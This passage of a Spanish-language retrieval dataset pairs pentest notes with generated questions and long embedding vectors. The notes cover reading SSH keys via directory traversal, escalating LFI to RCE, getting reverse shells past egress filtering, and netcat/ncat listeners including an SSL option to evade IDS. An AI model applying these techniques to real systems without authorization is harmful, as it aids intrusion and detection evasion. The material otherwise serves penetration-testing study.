0.04553, 0.00871, -0.0272, -0.05804, 0.05988, -0.00133, -0.07597, 0.02986, -0.06078]} +{"tipo": "pregunta", "herramienta": "Directory traversal", "perfil": "PENTESTERS", "fichero": "conocimiento/02 - Explotacion web/Directory traversal.md", "tema": "explotacion web", "fuente": null, "licencia": null, "texto": "## Siguiente paso\n- Lees `id_rsa` β†’ SSH como ese usuario.\n- Lees cΓ³digo/config β†’ credenciales β†’ Authentication attacks / reutilizaciΓ³n.\n- Si ademΓ‘s se **incluye** (PHP) β†’ escala a LFI a RCE.\n\nRelacionado: LFI a RCE Β· Burp Repeater e Intruder Β· OSCP MOC", "indexar": "que software puedo usar para probar la escalabilidad de exploits de autenticaciΓ³n con PHP?", "v": [-0.01075, 0.04176, -0.23522, -0.17725, 0.01987, -0.07699, 0.02106, -0.1031, -0.09265, -0.06663, -0.07667, 0.02525, -0.02779, 0.08328, -0.11781, -0.13786, -0.03841, -0.13629, 0.00178, -0.01149, 0.05034, -0.02696, -0.18066, -0.16243, -0.00327, 0.07994, -0.00506, 0.03861, -0.06626, -0.08858, 0.05067, 0.06959, 0.05119, -0.03885, -0.04879, 0.04654, 0.04301, -0.03657, 0.14401, 0.05543, 0.08804, 0.032, -0.07786, -0.00923, 0.09082, 0.09319, -0.0329, 0.037, -0.05924, 0.00653, 0.02552, -0.11106, -0.16262, -0.06654, 0.00114, -0.10472, 0.07516, -0.05432, 0.04974, 0.04919, -0.09879, -0.03824, 0.0065, -0.0322, 0.0215, -0.02659, 0.06666, 0.01102, -0.17274, 0.16739, -0.05458, 0.0748, -0.00272, 0.04418, -0.00294, -0.03915, 0.01995, -0.07366, -0.02152, 0.05611, -0.07397, -0.02468, -0.02176, 0.04105, -0.10303, -0.16184, 0.07376, -0.08096, 0.11051, -0.01283, 0.06975, 0.03277, -0.01713, -0.02907, 0.03779, -0.04001, 0.13661, -0.01472, -0.00389, 0.01855, -0.03412, -0.11667, -0.0128, 0.08158, 0.04132, -0.01284, 0.07156, -0.02275, -0.02932, -0.07876, 0.00234, -0.03049, -0.11551, 0.04271, -0.04231, 0.0113, -0.0025, -0.1134, -0.10663, -0.12087, -0.00293, -0.07061, -0.05721, -0.00431, 0.15046, 0.04128, 0.00975, 0.05942, -0.02053, -0.04822, -0.03236, -0.05154, -0.01986, 0.01315, 0.00816, 0.01921, 0.12423, -0.04296, 0.04824, 0.00381, -0.02655, 0.03876, -0.02532, 0.00233, 0.05569, -0.00321, -0.09811, 0.0009, -0.05781, 0.00237, 0.01868, -0.00738, -0.04603, 0.06361, -0.14553, -0.08119, 0.08804, -0.00847, -0.05632, 0.04208, -0.0898, 0.03283, 0.02288, 0.02732, 0.0143, -0.04901, -0.01244, 0.00168, 0.04692, -0.00232, 0.00993, 0.14891, 0.05567, -0.03759, 0.09839, -0.01284, -0.07645, -0.04148, -0.05341, -0.02922, 0.0064, -0.00501, 0.05471, -0.00687, 0.02509, 0.0396, 0.0434, 0.01226, -0.02755, -0.00185, 0.00822, 0.03995, 0.06179, 0.0342, 0.03508, 0.05654, -0.00413, 0.02346, 0.02596, -0.02967, -0.03712, -0.02467, -0.02562, -0.04433, 0.10497, -0.01274, 0.01706, 0.05024, -0.02371, 0.05147, 0.02802, -0.0042, 0.05884, -0.01289, -0.0273, -0.00039, -0.01129, 0.08669, 0.00394, -0.02057, -0.03794, 0.03009, 0.02735, 0.03629, -0.00041, 0.00026, -0.0449, -0.01921, -0.02451, -0.00682, 0.02154, 0.02692, -0.02855, -0.02014, -0.02, 0.0085, 0.04328, 0.01224, -0.06063, -0.07962, -0.03497, 0.10282, -0.00335, -0.02108, -0.02109, -0.04585, -0.03597, -0.01776, -0.01384, -0.02151, -0.03836, -0.02163, 0.0059, -0.03057, -0.01431, 0.03478]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Egress filtering\n\n> El firewall del **objetivo** bloquea ciertos puertos de salida β†’ tu Reverse shell no conecta y crees que el exploit fallΓ³.", "indexar": "que programa sirve para filtrar el trΓ‘fico de salida por IP?", "v": [0.03571, -0.03609, -0.14791, -0.24186, 0.07476, -0.23027, 0.05173, -0.02652, -0.0173, -0.01492, 0.13688, -0.10916, 0.06755, -0.05277, -0.0263, -0.02005, -0.00345, -0.11084, 0.1306, -0.0954, -0.04367, 0.17398, -0.07088, -0.14554, -0.03611, 0.06838, -0.10398, -0.0048, -0.14973, -0.1185, -0.06217, -0.03517, 0.1255, -0.08909, -0.03032, -0.13253, 0.05943, 0.05601, -0.00477, -0.02454, 0.05695, -0.02518, 0.01342, -0.0356, 0.03219, 0.0023, -0.00282, -0.05566, -0.01808, -0.07482, -0.03283, -0.08143, 0.03159, 0.0126, -0.10296, -0.01112, -0.0727, -0.10644, -0.09044, 0.00727, 0.06318, 0.06344, 0.00678, -0.07397, 0.02074, -0.1227, 0.0227, 0.085, -0.04658, -0.0461, -0.01114, 0.0326, 0.00684, 0.11697, 0.03259, -0.05596, 0.01557, 0.01787, 0.10475, -0.02745, 0.11115, 0.08735, -0.05085, -0.02005, -0.08126, -0.02701, 0.05511, -0.1324, 0.02023, 0.00816, -0.08374, 0.07409, 0.00891, 0.05511, 0.07439, 0.0363, 0.06186, 0.04114, 0.01812, 0.02835, 0.08434, -0.00976, -0.10635, 0.06683, 0.04026, 0.10003, 0.12248, -0.03536, 0.00714, 0.12476, -0.11211, 0.04536, 0.01954, -0.12842, -0.022, 0.02564, -0.01452, -0.02901, -0.01149, -0.0032, -0.0296, -0.02035, -0.09138, -0.01948, 0.05293, 0.08357, 0.00201, 0.10692, 0.01658, 0.00869, 0.04616, 0.05806, -0.09682, -0.02043, -0.08353, -0.06863, -0.01328, -0.0048, -0.02068, 0.01534, 0.07043, -0.02438, 0.00469, 0.04336, 0.06774, -0.02436, 0.03023, -0.09949, 0.00064, -0.04756, 0.0652, -0.06791, -0.00613, 0.00453, -0.02266, 0.03883, 0.0321, -0.05283, -0.05955, 0.02623, -0.08092, 0.07392, 0.00832, -0.01978, 0.10358, 0.06847, -0.02581, 0.00858, 0.09072, 0.02501, 0.02241, 0.03619, 0.01796, -0.07914, -0.06073, 0.01709, -0.04228, -0.04094, 0.01595, 0.0202, -0.04487, -0.00983, 0.01559, 0.03689, 0.00168, 0.00473, -0.07, 0.00018, -0.00995, -0.0414, -0.00921, 0.03976, -0.03383, 0.00395, 0.01322, -0.04062, -0.01746, -0.08472, 0.05478, -0.0609, -0.05241, -0.02237, 0.04217, -0.00197, -0.00985, 0.05769, 0.00564, -0.02612, 0.08019, 0.07435, -0.00247, -0.00747, 0.03597, -0.03823, -0.03376, 0.021, 0.04201, 0.01676, 0.09822, 0.08805, 0.00155, 0.01796, -0.03515, 0.05356, -0.02645, -0.03253, 0.01404, 0.00093, 0.04017, -0.01442, -0.05339, -0.00547, -0.04868, -0.06565, 0.00574, 0.00817, -0.06242, -0.03282, -0.04208, -0.11061, -0.03316, -0.03279, -0.03822, -0.08901, 0.00495, -0.00495, -0.05073, 0.00477, 0.05542, -0.0075, -0.0741, 0.02071, 0.03918, -0.01351, 0.0587, 0.00522]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Egress filtering\n\n> El firewall del **objetivo** bloquea ciertos puertos de salida β†’ tu Reverse shell no conecta y crees que el exploit fallΓ³.", "indexar": "con quΓ© puedo verificar si un firewall ha bloqueado mis conexiones?", "v": [0.11355, 0.1415, -0.14618, -0.09668, -0.03188, 0.00251, 0.00312, -0.00504, -0.02957, -0.09258, -0.01339, -0.02772, -0.02675, 0.02424, 0.11063, 0.0529, -0.06209, -0.04063, 0.02411, -0.07235, 0.11476, -0.10156, 0.03604, -0.10011, -0.03592, 0.02964, -0.10071, 0.04723, -0.11985, -0.20412, 0.00338, -0.08902, 0.12782, 0.0859, -0.03382, 0.11327, 0.04334, 0.15138, 0.15691, -0.00672, -0.0423, -0.00023, 0.01718, -0.03159, 0.03095, -0.07361, -0.04535, -0.07407, 0.07817, 0.01366, -0.04081, -0.07675, -0.13232, 0.00302, -0.0105, 0.02391, 0.1446, -0.00021, 0.08985, 0.02809, -0.14928, -0.09832, 0.1023, 0.04316, -0.03718, -0.04038, -0.02108, -0.04224, 0.00104, 0.03423, -0.02566, 0.02126, -0.04878, -0.03766, -0.02821, 0.01661, 0.01665, -0.01463, 0.11213, 0.1053, 0.06056, 0.05063, 0.06403, -0.05538, -0.08753, -0.02012, -0.13647, -0.10418, -0.05206, -0.13455, 0.08855, 0.10966, -0.08455, -0.00604, 0.00457, 0.03017, 0.00822, 0.11153, -0.08134, 0.0028, 0.03435, 0.02634, -0.10329, 0.12707, 0.02403, -0.02627, 0.02039, -0.06084, -0.01468, -0.0841, -0.03601, 0.01407, -0.05029, -0.09816, -0.05888, -0.04018, -0.11111, -0.0607, 0.04319, -0.0589, -0.05004, -0.05221, -0.09678, 0.04384, 0.05291, 0.06449, 0.0339, 0.06932, 0.00293, 0.03913, -0.026, -0.05153, -0.06637, -0.13031, -0.05999, 0.00306, -0.07428, -0.10785, -0.01461, -0.01983, 0.08405, 0.0054, 0.06662, 0.01241, 0.08485, 0.03568, -0.09453, -0.04346, -0.13381, -0.04595, 0.00543, -0.03908, -0.04715, 0.10593, -0.03311, 0.03221, 0.03108, -0.00366, 0.05568, 0.11489, 0.05376, 0.01149, -0.02473, 0.04702, -0.02153, 0.00154, -0.08238, 0.01052, 0.08088, 0.02061, -0.08224, 0.06232, -0.00147, -0.10635, -0.08215, -0.03848, -0.03486, 0.00026, 0.02701, -0.03287, -0.06602, -0.02337, -0.0017, -0.05498, -0.05222, 0.01819, -0.00939, 0.00534, 0.04561, 0.08089, 0.06072, 0.06552, 0.00485, 0.01471, -0.02348, -0.07868, -0.01173, -0.03142, 0.01984, -0.01048, -0.02887, -0.02176, -0.0064, -0.06598, 0.02338, 0.0193, -0.04837, -0.0031, 0.05932, 0.06051, 0.11716, -0.03088, 0.0716, -0.03955, -0.0246, 0.01255, -0.00682, -0.00924, -0.0151, -0.0167, 0.00269, 0.09091, -0.03252, 0.03114, 0.03928, -0.03207, -0.04614, 0.03114, 0.03839, 0.01514, -0.03681, -0.01316, -0.02432, 0.01541, 0.06095, 0.01077, -0.03419, -0.0166, 0.00312, -0.02845, 0.00957, 0.01484, 0.00811, -0.04855, -0.00166, 0.00267, -0.06589, 0.02668, -0.01078, -0.07262, -0.0042, 0.04388, 0.03548, -0.0126, 0.05326, -0.01402]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "# Egress filtering\n\n> El firewall del **objetivo** bloquea ciertos puertos de salida β†’ tu Reverse shell no conecta y crees que el exploit fallΓ³.", "indexar": "hay alguna herramienta para simular un reverse shell en una red restringida?", "v": [0.00089, -0.00577, -0.12526, -0.14275, 0.02225, -0.09273, -0.2459, -0.05583, 0.1141, -0.02591, -0.15116, -0.093, 0.08749, -0.168, 0.17166, 0.02749, -0.16477, -0.03203, -0.00736, -0.02173, -0.05737, -0.08433, -0.09114, -0.00744, -0.02305, 0.0462, 0.0657, 0.04086, -0.12128, -0.08156, -0.05096, -0.01761, 0.10826, -0.1251, -0.17852, 0.05085, 0.03555, 0.01277, 0.02574, 0.06125, -0.0141, 0.08048, -0.03362, 0.0289, 0.12023, -0.01087, -0.07412, -0.05209, -0.06839, 0.03522, -0.09357, -0.17506, -0.16213, -0.05473, 0.06775, -0.19004, 0.13258, -0.14108, 0.00099, -0.09729, 0.00608, -0.00633, -0.03826, 0.01341, 0.07194, 0.03578, 0.03824, -0.04927, -0.05456, 0.093, -0.02045, 0.00312, 0.00856, 0.0193, -0.05955, -0.065, 0.00714, 0.01758, 0.02675, -0.02642, -0.0448, -0.05947, -0.03751, 0.04037, 0.0475, -0.0917, 0.03709, -0.00237, 0.07472, -0.02249, -0.03072, 0.02072, 0.04976, 0.02672, 0.04914, -0.04459, 0.0296, 0.01798, -0.04153, -0.05135, 0.10827, -0.0003, -0.0533, 0.06347, -0.01817, 0.05823, -0.03714, -0.0258, 0.01445, 0.09481, 0.04302, -0.02269, 0.01757, 0.07415, 0.06407, 0.01704, -0.02315, -0.06803, 0.07099, -0.10376, 0.05535, -0.02982, -0.08839, -0.02105, -0.04613, 0.0531, -0.12046, 0.06898, -0.03221, -0.06951, -0.05541, -0.00727, -0.03998, 0.00456, -0.06126, 0.03671, 0.0471, -0.06845, 0.03754, -0.05918, -0.00524, 0.04671, -0.05957, -0.10223, -0.01059, 0.06217, 0.03261, -0.03196, -0.07189, 0.05715, -0.0192, 0.00666, 0.01262, 0.02047, -0.0437, 0.0622, 0.02237, -0.00832, -0.00524, 0.00589, -0.03851, -0.01278, 0.00501, -0.01353, 0.02306, -0.03283, -0.01674, -0.04174, -0.01346, -0.02403, -0.01026, 0.02333, 0.0705, 0.01009, 0.03116, 0.01913, -0.07993, -0.04687, -0.02548, -0.12764, 0.08675, 0.01224, -0.02113, -0.08792, -0.00734, -0.06175, 0.00543, 0.0453, 0.0178, 0.00928, 0.02231, 0.02729, 0.0288, -0.05038, 0.03004, 0.1284, 0.04445, -0.0066, 0.07486, 0.01526, -0.03084, -0.04763, -0.02362, -0.05569, 0.00303, 0.07818, -0.04163, 0.03164, 0.02625, 0.06349, 0.03696, 0.02825, -0.01416, 0.08947, 0.01072, -0.04049, 0.09856, 0.02682, -0.0272, -0.02927, 0.05686, -0.03084, 0.00279, 0.05369, -0.06565, 0.04298, 0.02936, -0.00871, 0.0011, -0.03668, 0.04856, -0.04987, 0.06163, 0.06391, -0.03851, -0.03201, 0.06617, -0.0039, -0.04283, -0.02502, -0.01313, 0.06519, 0.01508, -0.04331, 0.0029, -0.01536, -0.03225, -0.05409, 0.01057, -0.02675, -0.02795, -0.01388, 0.03512, -0.07978, 0.01823, -0.01104]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## QuΓ© probar (puertos de salida)\n```\n80, 443, 8080, 53, 4444\n```\n- Si **ninguno** funciona β†’ considera una shell por **ICMP** o canal DNS.\n- 53 (DNS) y 443 suelen estar permitidos casi siempre.", "indexar": "que programa usa puerto 80, 443 o 53 para comunicarse?", "v": [0.09919, -0.04042, 0.0004, -0.15211, 0.0162, -0.15332, 0.08336, -0.09451, -0.0932, -0.07771, -0.1495, 0.02815, 0.0472, -0.00677, -0.05346, -0.08606, -0.02552, 0.09954, 0.07777, -0.02717, -0.03873, 0.08675, 0.01784, -0.10315, 0.01096, 0.07457, -0.01765, -0.01859, 0.06527, 0.0465, 0.09201, 0.02392, 0.13475, -0.07344, 0.04077, -0.05324, -0.00932, 0.0143, 0.13468, 0.15852, -0.01445, 0.06366, -0.01444, 0.00165, 0.18552, -0.0234, 0.00883, -0.04238, 0.06403, -0.01847, -0.11369, 0.02382, -0.02081, 0.1566, -0.00051, 0.08797, 0.01434, 0.00121, -0.09845, 0.00822, 0.07261, -0.00795, 0.01628, -0.09236, 0.08696, 0.00472, 0.08909, -0.0182, -0.16377, 0.03195, 0.02582, -0.03415, 0.03625, 0.04421, 0.02539, -0.0147, -0.08334, -0.01757, 0.01614, -0.05072, 0.04758, -0.05208, 0.00594, -0.00737, -0.0974, -0.04577, -0.01855, 0.00971, 0.00894, -0.00193, 0.02064, -0.0302, -0.07698, 0.0972, 0.04016, -0.0562, 0.00981, 0.09056, -0.00281, 0.08821, 0.04389, 0.03225, -0.06065, -0.0202, -0.05093, 0.06116, -0.02232, -0.0722, 0.00747, 0.12485, 0.03288, -0.06992, 0.06092, -0.10511, -0.04674, 0.00542, -0.03706, -0.06292, 0.10341, -0.01703, -0.06444, 0.07181, -0.06097, 0.0507, 0.08079, -0.03125, -0.03127, 0.11451, 0.00118, 0.07795, 0.1256, -0.07841, -0.03494, -0.04908, 0.06639, -0.02394, 0.09228, -0.00302, -0.02998, -0.0004, -0.07643, 0.08671, -0.02436, -0.00502, 0.04647, 0.10015, -0.00908, -0.02817, -0.01989, 0.05697, 0.00064, 0.09432, -0.04613, 0.05224, 0.03407, 0.00064, 0.08259, -0.02952, -0.07493, -0.04713, -0.03661, 0.04899, -0.07163, -0.07182, 0.06532, -0.06071, -0.11577, 0.06628, 0.0876, -0.00522, -0.03908, 0.0359, -0.03335, -0.06702, -0.05255, 0.01669, -0.07345, -0.01568, -0.08363, -0.08787, -0.05333, 0.05215, -0.00182, -0.13414, -0.03699, -0.04142, -0.05227, 0.03574, -0.02285, 0.00976, -0.0009, 0.02717, -0.01695, -0.06782, 0.00084, 0.09333, -0.08593, -0.06032, 0.00657, -0.03633, -0.06416, 0.04093, 0.04854, -0.01123, 0.00196, 0.13654, -0.03002, -0.06484, 0.0139, 0.12047, 0.07101, -0.10952, 0.02696, 0.00795, 0.00333, 0.03491, -0.04125, 0.05685, 0.07186, 0.10434, -0.0185, 0.00186, -0.04719, 0.08767, -0.00953, -0.0858, -0.00023, 0.0241, 0.02184, -0.01367, -0.04676, -0.01767, 0.00942, -0.04125, 0.0357, 0.00103, -0.03677, -0.01723, -0.04393, -0.10594, 0.06108, 0.03682, -0.01383, 0.07185, 0.05563, 0.01361, -0.0725, 0.05687, -0.03056, 0.01221, -0.00999, 0.0461, 0.03493, -0.04096, 0.04219, -0.04636]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## QuΓ© probar (puertos de salida)\n```\n80, 443, 8080, 53, 4444\n```\n- Si **ninguno** funciona β†’ considera una shell por **ICMP** o canal DNS.\n- 53 (DNS) y 443 suelen estar permitidos casi siempre.", "indexar": "con que herramienta puedo probar si los puertos de salida no funcionan?", "v": [0.14172, 0.11601, -0.21262, -0.14438, 0.03346, -0.07132, 0.09758, -0.03071, -0.08075, -0.12361, -0.14127, 0.05245, 0.10595, -0.03061, -0.07071, -0.02017, 0.03692, -0.06688, -0.05367, 0.04046, -0.01852, -0.02431, -0.09112, -0.10852, 0.01174, 0.07388, 0.07879, -0.00641, -0.17454, 0.03586, -0.02185, -0.00723, 0.16526, -0.08667, -0.0315, -0.16248, -0.03448, 0.01684, 0.13042, 0.09289, 0.03163, -0.00363, -0.01102, -0.00886, 0.06776, 0.01414, -0.09988, -0.04482, -0.03742, 0.01707, -0.03835, -0.14394, -0.09998, 0.00011, -0.06258, -0.13781, 0.13099, -0.00748, -0.00122, -0.09365, -0.05651, 0.04872, -0.03501, -0.04138, 0.04048, -0.0786, 0.00307, 0.00228, -0.10831, 0.08221, -0.09224, 0.05138, -0.06422, 0.1019, -0.03905, -0.05455, 0.00754, 0.05688, 0.08179, 0.0443, 0.09044, 0.02224, -0.04645, -0.0373, -0.05343, -0.13891, -0.05204, -0.06936, 0.05149, -0.11268, -0.01173, 0.00181, 0.04668, 0.10096, -0.05683, 0.02384, 0.03711, -0.00973, -0.00863, -0.0276, 0.1624, 0.0483, -0.07496, 0.08669, -0.03328, -0.00767, 0.0171, -0.02119, -0.00818, 0.03128, 0.01546, -0.01693, -0.03557, -0.04716, -0.088, 0.07195, -0.10881, -0.1349, -0.06124, 0.00933, 0.02243, -0.02961, -0.10399, -0.05465, 0.03014, 0.01869, 0.00622, 0.08134, 0.04637, -0.01877, 0.03654, -0.03763, -0.07772, 0.0247, -0.02922, -0.07381, 0.04532, -0.07234, -0.02069, -0.10796, -0.03495, 0.05829, -0.04352, -0.08698, 0.03722, 0.00928, -0.0517, 0.00382, -0.05418, 0.00205, 0.03332, -0.02587, -0.02681, 0.06221, -0.0948, 0.00016, 0.10416, -5e-05, -0.074, 0.06166, -0.04186, 0.02118, -0.01109, 0.03286, 0.06785, -0.04479, -0.00775, -0.04985, 0.04635, 0.00939, 0.00486, 0.11966, 0.02375, -0.03879, 0.01315, -0.03362, -0.08851, -0.02124, -0.01222, -0.04798, -0.02377, 0.08895, -0.05985, -0.07718, -0.02526, -0.07717, -0.01417, -0.08371, 0.02116, 0.08107, -0.01237, 0.04908, 0.00774, -0.05316, 0.02813, 0.01283, 0.01646, -0.04408, 0.03365, -0.01803, 0.00348, -0.00202, 0.01922, -0.08417, 0.03404, 0.06091, -0.08983, 0.0565, -0.01497, 0.03437, 0.04857, 0.0039, 0.03248, -0.02909, -0.04381, 0.0071, 0.00344, 0.01035, 0.01897, 0.06238, 0.00177, 0.04594, 0.03617, 0.0589, 0.00636, 0.04677, 0.03698, 0.05933, 0.0271, 0.01032, 0.05387, 0.00835, -0.05553, -0.02358, 0.01922, -0.00951, 0.03194, -0.03447, -0.09231, -0.05769, -0.02188, -0.00724, 0.0063, -0.03796, -0.00364, -0.07191, -0.00915, -0.03824, 0.00969, -0.03406, -0.06008, 0.04549, 0.07499, -0.04544, 0.05351, -0.01951]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## QuΓ© probar (puertos de salida)\n```\n80, 443, 8080, 53, 4444\n```\n- Si **ninguno** funciona β†’ considera una shell por **ICMP** o canal DNS.\n- 53 (DNS) y 443 suelen estar permitidos casi siempre.", "indexar": "cual es una alternativa libre a las herramientas de escaneo bΓ‘sico?", "v": [-0.17732, 0.01042, -0.14108, -0.00367, -0.08608, -0.10074, -0.07147, -0.10463, -0.17496, -0.03758, -0.14733, -0.09402, -0.1188, -0.02136, 0.13438, 0.03156, 0.01545, -0.1159, 0.05621, 0.07686, -0.09012, 0.04206, -0.0999, 0.05856, -0.07853, -0.06218, -0.03277, 0.03453, -0.16078, 0.13477, 0.01218, 0.07471, 0.10413, -0.02538, -0.04057, -0.03441, 0.12686, -0.02015, 0.06767, -0.02961, -0.02633, -0.05863, -0.06215, 0.01736, 0.00967, -0.10301, -0.07379, 0.07244, -0.02915, 0.07833, -0.06681, -0.08644, -0.07513, -0.00503, 0.05462, -0.08982, 0.24155, -0.10624, -0.00877, -0.10105, -0.15123, 0.06877, 0.04856, -0.04477, -0.03986, 0.01224, -0.01329, -0.05223, -0.05692, 0.10003, 0.01163, -0.00031, 0.05372, -0.07665, -0.11965, -0.01681, -0.01922, 0.00069, 0.01568, 0.02152, 0.03077, -0.04643, -0.03313, -0.00506, -0.12759, -0.04521, 0.11512, -0.10208, -0.02739, 0.00351, 0.02992, 0.05205, -0.01549, 0.07262, 0.03082, -0.00961, 0.03917, 0.05865, 0.01435, 0.06046, 0.09894, -0.06969, -0.10967, 0.02734, 0.04266, -0.04795, -0.00876, 0.05723, -0.13873, 0.06872, -0.04883, 0.12215, 0.01962, 0.02712, 0.00246, -0.02432, -0.02364, -0.01067, 0.00523, -0.03316, 0.03678, 0.00238, -0.07805, -0.05896, 0.06159, -0.00941, 0.00434, 0.03039, 0.04904, 0.02197, 0.06485, -0.03092, -0.09647, -0.06564, -0.07394, -0.0858, 0.12508, -0.09528, 0.01128, -0.06022, -0.02412, 0.05401, -0.05522, -0.08991, 0.04043, -0.00019, 0.04541, -0.07867, -0.00723, -0.03472, -0.06237, -0.0191, -0.01655, 0.13174, -0.08712, -0.02985, -0.01821, 0.00726, -0.04589, 0.05595, 0.02429, -0.08959, 0.02742, -0.00444, -0.01461, -0.07113, 0.00073, -0.00936, -0.10258, 0.01019, 0.04229, 0.11262, 0.06192, -0.02497, 0.01373, -0.04002, -0.04955, -0.09357, -0.02811, -0.01478, 0.04682, 0.065, -0.08091, 0.00572, 0.02065, -0.06837, -0.03988, -0.01715, 0.01838, 0.04268, -0.02704, 0.03854, -0.06326, -0.09557, -0.00492, 0.02903, -0.0314, -0.07599, 0.02314, -0.00282, -0.07798, -0.00967, -0.02405, -0.05382, 0.01218, -0.00115, -0.04879, -0.03503, -0.02027, 0.06624, 0.03056, -0.01532, 0.05298, -0.0091, 0.00109, -0.00201, 0.00149, 0.01873, 0.00049, -0.0065, 0.03234, 0.02736, 0.04809, -0.01852, -0.06111, 0.01167, 0.00104, 0.01205, 0.01851, 0.00138, 0.00849, -0.04939, -0.01041, 0.00696, 0.01436, -0.02783, 0.03162, 0.05211, -0.00818, 0.02697, 0.05459, 0.07595, -0.04873, -0.0135, -0.04111, 0.01162, -0.03899, -0.04636, -0.03937, -0.03505, 0.00842, 0.04488, 0.04409, -0.02586, 0.01628, -0.01986]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Listener correcto segΓΊn objetivo\n```\nnc clΓ‘sico β†’ vΓ­ctima Linux\nncat --ssl β†’ evadir IDS\nstty raw -echo+nc β†’ Windows ConPtyShell\n```", "indexar": "que herramienta sirve para escuchar conexiones en la vΓ­ctima Linux?", "v": [-0.0027, 0.14149, -0.17875, -0.23623, -0.06024, -0.17869, -0.26483, 0.06051, 0.04599, -0.00416, 0.03956, -0.06042, 0.01605, 8e-05, 0.05009, -0.04512, 0.04683, -0.05655, -0.01451, -0.11253, -0.03757, 0.11081, -0.12696, 0.004, -0.03578, 0.05247, 0.11921, -0.10075, 0.0015, 0.09528, -0.08425, -0.01683, -0.00588, 0.07794, -0.05278, 0.01756, -0.04068, 0.09367, 0.12731, 0.12234, 0.12621, 0.00895, -0.0568, 0.00728, 0.00942, -0.11291, -0.0252, -0.0144, 0.07494, 0.07225, -0.02028, -0.05559, -0.15186, -0.09446, 0.03173, -0.05909, 0.15182, -0.16694, 0.10676, -0.0526, -0.16805, -0.04192, 0.0323, -0.0414, 0.05606, -0.01621, 0.03882, -0.02709, -0.08005, 0.04782, -0.04294, 0.05647, 0.03065, 0.00031, 0.03982, -0.03132, -0.01671, 0.04919, 0.04809, 0.03066, 0.07363, -0.03473, -0.05587, 0.00132, -0.09317, 0.02078, 0.13557, 0.0215, -0.00423, 0.00425, 0.02334, 0.06985, 0.02128, 0.03832, 0.09246, -0.03199, 0.06417, -0.03568, 0.01106, -0.07617, 0.13826, -0.01372, -0.02791, 0.05777, 0.04788, -0.04359, -0.01381, -0.01782, -0.05243, -0.04642, 0.01767, 0.05494, 0.06318, -0.01207, -0.07097, -0.07676, -0.04006, -0.00262, 0.0076, 0.04191, 0.09002, 0.0551, -0.01454, -0.00643, -0.07897, -0.00803, -0.04421, 0.06333, 0.00828, -0.09593, 0.08252, -0.09631, 0.02752, -0.02274, 0.03088, -0.0126, 0.04325, -0.1442, 0.00292, -0.02243, 0.077, 0.06475, -0.06938, -0.03675, 0.01788, -0.03332, 0.04309, -0.02066, 0.01103, -0.04331, 0.03702, -0.0387, -0.04519, -0.04093, -0.08652, -0.03889, -0.01397, -0.00729, -0.0536, 0.0099, -0.04632, -0.05251, 0.03898, -0.00836, -0.01062, -0.06529, 0.01626, 0.04957, 0.12742, 0.02133, 0.02966, -0.0053, 0.06107, -0.01384, -0.10486, -0.15279, -0.00756, -0.02112, 0.02337, -0.03274, -0.04357, -0.00135, -0.05826, -0.07585, 0.05423, 0.01988, -0.04691, -0.02328, -0.03638, 0.04041, 0.00076, 0.0257, 0.00834, -0.00615, 0.02232, -0.00717, -0.02402, -0.00462, -0.05428, 0.01963, -0.12155, 0.03007, -0.01861, -0.05725, 0.05624, 0.06335, -0.01988, -0.05252, -0.01612, 0.03995, 0.04388, 0.03851, 0.01237, -0.02835, 0.03496, -0.04756, 0.02167, 0.03182, 0.02687, 0.05214, -0.03748, -0.02182, 0.04279, -0.01373, 0.01697, -0.00673, -0.00719, -0.00295, -0.003, -0.04125, 0.00964, -0.0065, 0.01593, 0.01151, -0.02989, -0.06279, -0.00763, 0.04282, -0.061, -0.0091, -0.03468, 0.05361, -0.0075, -0.02935, -0.02614, -0.01563, -0.00443, -0.00611, -0.04897, -0.07431, -0.03527, 0.02315, 0.06953, -0.03854, -0.00593, -0.00733]} +{"tipo": "pregunta", "herramienta": "Egress filtering", "perfil": "PENTESTERS", "fichero": "conocimiento/03 - Shells/Egress filtering.md", "tema": "shells", "fuente": null, "licencia": null, "texto": "## Listener correcto segΓΊn objetivo\n```\nnc clΓ‘sico β†’ vΓ­ctima Linux\nncat --ssl β†’ evadir IDS\nstty raw -echo+nc β†’ Windows ConPtyShell\n```", "indexar": "cual es una alternativa a nc para evadir los sistemas de detecciΓ³n?", "v": [0.02375, -0.04271, -0.09033, -9e-05, 0.0256, 2e-05, -0.04973, -0.07759, -0.07448, 0.03193, -0.08586, -0.24568, -0.12406, -0.03928, 0.02837, 0.02593, 0.10124, -0.098, 0.11674, -0.01337, -0.1309, -0.04756, -0.08158, 0.0111, 0.01222, 0.12795, -0.22051, 0.12957, -0.00337, 0.07021, 0.01586, 0.02705, 0.11469, -0.00435, -0.15573, 0.12089, 0.04141, -0.09077, 0.0481, -0.02933, 0.02789, -0.07361, -0.0025, -0.02861, 0.03473, -0.17865, -0.07312, -0.04734, -0.00537, -0.06872, -0.16423, 0.11698, -0.19617, 0.01234, -0.00596, -0.1182, -0.03147, 0.00338, 0.06688, -0.03571, -0.10853, 0.06247, -0.00987, -0.04027, 0.0548, 0.0294, -0.03873, -0.07766, -0.14749, -0.07386, 0.06449, -0.01476, 0.02916, -0.03232, 0.04738, 0.02746, 0.04153, 0.01794, 0.05025, -0.02462, -0.04132, -0.00453, -0.01811, 0.07381, -0.11699, -0.06061, 0.03427, -0.04294, -0.01141, 0.00664, -0.03452, -0.03468, 0.02875, 